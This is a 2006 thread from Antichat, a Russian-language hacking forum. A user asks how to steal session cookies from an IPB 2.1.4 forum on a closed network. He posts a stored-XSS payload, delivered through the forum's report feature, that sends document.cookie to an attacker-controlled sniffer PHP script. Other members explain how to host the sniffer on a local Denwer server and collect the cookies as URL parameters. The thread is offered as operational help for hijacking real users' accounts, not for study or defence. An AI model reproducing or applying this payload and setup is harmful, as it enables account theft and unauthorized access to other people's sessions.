ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф?
  #1  
Старый 25.12.2006, 07:54
Аватар для karabym
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331

Репутация: 44
По умолчанию Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф?

Собстевнно как правильно настроить сниф на денвере локально...

Хочу вытащить куки с ipb 2.1.4 метод понял как а вот

сниф как правильно настроить хз

Спрашивается а зачем тебе локально то

Да потомучто форум крутится в закрытой сетке в тырнет доступа нет....

Вот вопрочец ещо по xss через функции жалоба

<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script>

Почему собственно сниф в .php я так понимаю что в
версии 2.1.4 нет фильтрации на даный метод и даже не обязательно шифроваться под gif ?!
 
Ответить с цитированием

  #2  
Старый 25.12.2006, 08:02
Аватар для ToniKapuchon
ToniKapuchon
Участник форума
Регистрация: 26.02.2006
Сообщений: 209
Провел на форуме:
2418438

Репутация: 93
По умолчанию

А чё то так и не понял, что ты хочешь!!! в чём у тебя проблема ты не можешь всунуть скрипт в форум, или у тебя проблемы со скриптом, который получит кукки!??
 
Ответить с цитированием

  #3  
Старый 25.12.2006, 08:04
Аватар для karabym
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331

Репутация: 44
По умолчанию

ДА нет хочу сниф настроить локально у себя на вебсерваке так как сетка закрытая...

Вобщем как правильно его натроить чтоб перехватывал куки

Я так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!

Последний раз редактировалось karabym; 25.12.2006 в 08:10..
 
Ответить с цитированием

  #4  
Старый 25.12.2006, 08:14
Аватар для def_
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325

Репутация: 18
По умолчанию

Цитата:
Собстевнно как правильно настроить сниф на денвере локально...
Хочу вытащить куки с ipb 2.1.4 метод понял как а вот
сниф как правильно настроить хз
Спрашивается а зачем тебе локально то
Да потомучто форум крутится в закрытой сетке в тырнет доступа нет....
ты что-то путаешь - локально, это когда ты обращаешься к скрипту с той же машины на котором он работает адрес в этом случае будет: 127.0.0.1/script.php или localhost/script.php. если тебе нужно обратиться у скрипту из локальной сети, проблемы нет - делаешь это по ip под которым комп зарегестрирован в сети.

вторую часть вопроса вообще не понял, переформулируй его как-нибудь чтоли, распиши подробнее
 
Ответить с цитированием

  #5  
Старый 25.12.2006, 08:17
Аватар для def_
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325

Репутация: 18
По умолчанию

теперь понял, дополнительной настройки тебе никакой не надо просто ставишь сервак, делаешь дотупным из сети, заливаешь сниффер, кидаешь кому надо ссылку на него, в ней адрес до твоего сервака это твой ip в локальной сети
 
Ответить с цитированием

  #6  
Старый 25.12.2006, 08:18
Аватар для karabym
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331

Репутация: 44
По умолчанию

Распишу поподробней :
Есть скрипт снифа кидаю его сюда home\custom\www
в файле .htaccess делаю настройки чтоб порт 80 светился в сетке
далее на форуме юзаю данную xss через функции (жалоба)

Правильно ?! или всеже денвер нужно донастроить чтоб он перехватывал куки...
 
Ответить с цитированием

  #7  
Старый 25.12.2006, 08:21
Аватар для _Great_
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

Цитата:
так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!
вполне нормально. так и сделай
 
Ответить с цитированием

  #8  
Старый 25.12.2006, 08:21
Аватар для def_
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325

Репутация: 18
По умолчанию

ничего донастраивать не надо, у тебя же куки передаются просто как параметры у скрипта
 
Ответить с цитированием

  #9  
Старый 25.12.2006, 08:23
Аватар для Dmitriy507
Dmitriy507
Участник форума
Регистрация: 29.04.2006
Сообщений: 171
Провел на форуме:
333060

Репутация: 63
По умолчанию

чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом
 
Ответить с цитированием

  #10  
Старый 25.12.2006, 08:23
Аватар для _Great_
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

def_, угу.. просто будет типа http://yourcomp/sniffer.php?cookie=КУКИСЫ.
Отсюда видно, что достаточно настроить денвер так, чтобы он работал не только локально, а чтобы его было видно и из локалки.

Dmitry507, ты что-то странное куришь) бросай0))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Форумы 1 26.11.2004 18:15
Как правильно настроить firewall??? Twinkles-hak Чаты 8 12.08.2004 08:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ